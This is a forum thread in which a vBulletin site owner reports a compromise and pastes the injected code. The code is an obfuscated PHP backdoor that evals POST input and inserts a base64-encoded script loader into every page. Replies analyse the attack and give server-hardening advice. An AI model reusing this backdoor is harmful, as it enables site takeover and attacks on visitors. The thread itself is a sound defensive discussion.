|
HACKED - Make sure you are secure
Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com to see a PHP error syntax on line 1...
I open up my index file and find this: Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?phpThis was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected in. My database was not touched, but I had to delete the installation of VB and install a fresh install and connect to the database. I did some research on this, and results are slim but its attacking programs as well. Oscommerce for example: http://forums.oscommerce.com/lofiver...p?t321418.html Anyone see this before? I was more in panic to get my site up, now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to VB or what ever can be done. |
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.
|
Quote:
I would of thought, though, if they got into the server through a backdoor or something, they would of effected my other accounts. I have VB running on another account for another site, and a few other accounts with various programs that were not touch (and have been on there for a very long time) Here is the list of my mods, I have ibProArcade v.2.6.8 which this file structure was changed I noticed. Here is a list of my other mods: Admin Log In As User Cyb - Advanced Permissions Based on Post Account Fake User (adds a couple guests) GTSmilieBox Panic Button Plus Mood vB Ad Management vBadvanced CMPS vbSEO Site Map Welcome Headers --------------- Added [DATE]1238915113[/DATE] at [TIME]1238915113[/TIME] --------------- Maybe someone can chime in? This guy is getting FTP access, I have formatted all my pcs to make sure I don't have a virus, and my host is looking through everything as well. Thing that throw my interest: Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, I also disabled my FTP server... |
It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server’s temporary directory and tries to use them. Pretty sure the hacker uploaded a simple PHP shell into your insecure server. Personally, I would change host. It is obvious they don't care about security. |
Quote:
The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole, if not I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well. Considering it is a VPS, I have multiple accounts on there including another site for VB.. why is this guy going on after this site? |
The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:
Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes. |
Quote:
I agree - I took your advice and moved - I can't let this sit over my head :erm: |
If your on a VPS chances are good, security and management relys on you or your server admin.
Your server security is only as secure as your least secure admin/server manager. |
Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.
All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server where he controls the HTML and javascripts. In his HTML there, all he needs is an img tag with src= any url at your vb3 site and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request. img isn't the only tag, either, script tags work, too, as do css (link) tags, and a few others. |
That's why vBulletin introduced CSRF protection. ;)
|
Quote:
Two mods I'd love to see, but haven't found here are: 1) Allow trusted users (e.g. by user group) to post HTML in forums. Right now, you can turn on HTML in one or more forums, but globally for all users. 2) Fix the HTML posting so it strips out script tags and other potentially malicious things (img with src=something.php?args - get rid of ?args) |
Quote:
|
I guess the same would go with this code then? Looks like an
Code:
<html><body><script>alert('SwZNd');</script></body></html>I found that in a PNG file on one of my clients accounts, along with a .zip file and a full directory of helpdesk software, along with a new database for that program. |
Anything that looks like that generally isn't good. ;)
|
Quote:
What does that code do, pretty much the same as above? Access a file in tmp to great un rooted access? Dumped that host likes its hot. |
The code above doesn't do anything. It's just "test" script.
|
Quote:
No security at all apparently.. |
How do you secure the tmp dir ? chown it?
|
Quote:
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPS run inside a virtual environment and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS on the real server and from there, well, you can do everything. Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory. And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;) |
Quote:
|
Quote:
|
Sorry for reviving this old thread but how can I know if my site is compromised?
|
Quote:
|
You don't really know until its too late. However, as mentioned above, keeping your software as up to day as possible will reduce this risk.
|
What about the tmp folder?
|
What about it? As long as you keep PHP's temp directory secured, you should be fine.
|
What I meant was how do I know if the /tmp/ folder is not secured?
|
Quote:
I posted this issue long time ago but people thought I'm crazy. I even wrote a tutorial on this site how to secure vB... Put it this way: You have a 0777 dir into your /var/www/html (or whatever is the web root)? You can be hacked, very easy. Read this article I wrote long time ago... probably nobody read it. Then secure the same way the curent 0777 dirs, not just the config file. Chmod them to 0750 and own them by nologinuser:root. |
Quote:
|
Teck-
Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation? I was just hacked yesterday and confirmed that it was some sort of database insertion, based on that when I restored a backup database, the hack was cleared. I wasn't able to find any files with changed dates. Is there some other way, other that the hacker breaking the config.php that they could manipulate the database? Note that I also have htaccess on all pertinent directories. Thanks! |
Quote:
|
Quote:
If that is done, every "hacker" will be able to read that file as well. Better spend your time keeping your VB & Plugins up-to-date and use things like mod_security / suhosin and the typical setups like chroot / jail. That's more time consuming but no "security by obscurity" when moving some files just to have a work-around that VB can read them. And make sure your VB files aren't writeable by PHP itself, if you store uploads in the filesystem, move that directory outside the webroot and additionally some directories like images / signaturepics - don't need PHP because there just images are stored. Something simple like: Quote:
Finally - mod_security & suhosin should be used. First starting them both in logging mode to collect a whitelist, highly depends on how your forum is used, and once that whitelist is completed to sort out false-positives set both in blocking mode. And - as last addition - you can setup an IDS system that creates checksum of your VB files and alerts you if there're any changes. Yes - I can do this ;) It won't even cost much ;) |
I hate to hjack this thread but Angel-Wings has got my attention.
I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs. On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmed of the only two mods I have installed and he indicated they work on the admincp level so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in? It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options. Thanks for any input. |
If you would of done as i posted in your own thread, you wouldn't of needed to restore a backup.
1. You should of upgraded vb, hacks/addons, server backend and anything else outdated. 2. Sym linking your config.php isnt going top stop the hacker either. 3. Blocking foreign based ips isnt going to stop him either. Seeing as you still present the injection hole for him to use, he will be back to visit you again. |
Quote:
Maybe better spend your time fixing the holes - if I don't look the door and just paste a huge poster over it the door itself isn't more "secure" and this "door" is the problem, not how to hide it from someone. Quote:
Quote:
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :) |
Quote:
I am at 3.8.3 [EDIT: Actually 3.8.2]. I am not sure that 3.8.4 has any security fixes in it. I'll double check. I believe my host has the server up to date. Again, I'll double check. I can't see how just updating as you suggested would have removed the hack they injected without me restoring the backup (note that this was a database restore only, not entire system). No matter what I did, it showed a disturbing picture and hackers text. It seems that would be in the database no matter what updates were performed. Quote:
Code:
RewriteEngine onQuote:
Quote:
Thanks again for input. |
We had about a dozen of cases in the past week from our clients of websites with vBulletin that were hacked. Anyhow, it turned out all of them had been hacked through a Wordpress installed on the server. Some of our clients had old WP installation they had forgotten about, others did not upgrade as they were recommend to, and script kids entered through WP, took the passwd file, and decrypted passwords, gaining FTP access.
There are many ways to prevent this; keep your system always updated; keep your applications always updated; and then do everything you can to secure your system. The best way to prevent attacks that write files to a directory to execute them is to have a system like SELinux in place, or GRSecurity. There are wonderful linux distributions that, for a few bucks per year, provide a secured kernel with many layers of protection applied - from modsecurity to granular permissions, and everything in between. |
The reason i stated you didnt need to restore from a back up is that you could of just removed the code they injected, which was likely a base64 code into a template, most likely spacer_open.
As stated, you haven't plugged the hole and your not going to stop him from revisiting your forum doing a IP block or symlinking your config file. Unless you know for sure that everything on your site/server is secure, your at risk @Carlito, excellent point on the WP, thats why i told him everything needs to be upgraded. |
Quote:
I just upgraded to 3.8.4. I'm not familiar with the coding of databases. Is it something I can check now to see if there is a hole and the 'base64 code into a template, most likely spacer_open' can be used again? How does one check for these vulnerabilities? No Wordpress on my side but I did talk to my host and this being a shared server, I guess there is always a possiblity of someone hacking another database or application on the other virtuals and affecting my system? |
Quote:
Really depends on how their machines are configured so blaming them might be too early - still yes, it's possible. Hope you still have the logs saved - maybe they'll like to see them for analysis. Oh - and you htaccess just blocks proxies that shout out to the world they are proxies. No "real" hacker would use such anyways. Like said - really recommend mod_sec to block things you don't want - beginning with direct IP access and ending with filtering bad useragents or injection attacks. |
| All times are GMT. The time now is 04:54 PM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
| X vBulletin 3.8.12 by vBS Debug Information | |
|---|---|
|
|
 More Information |
|
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|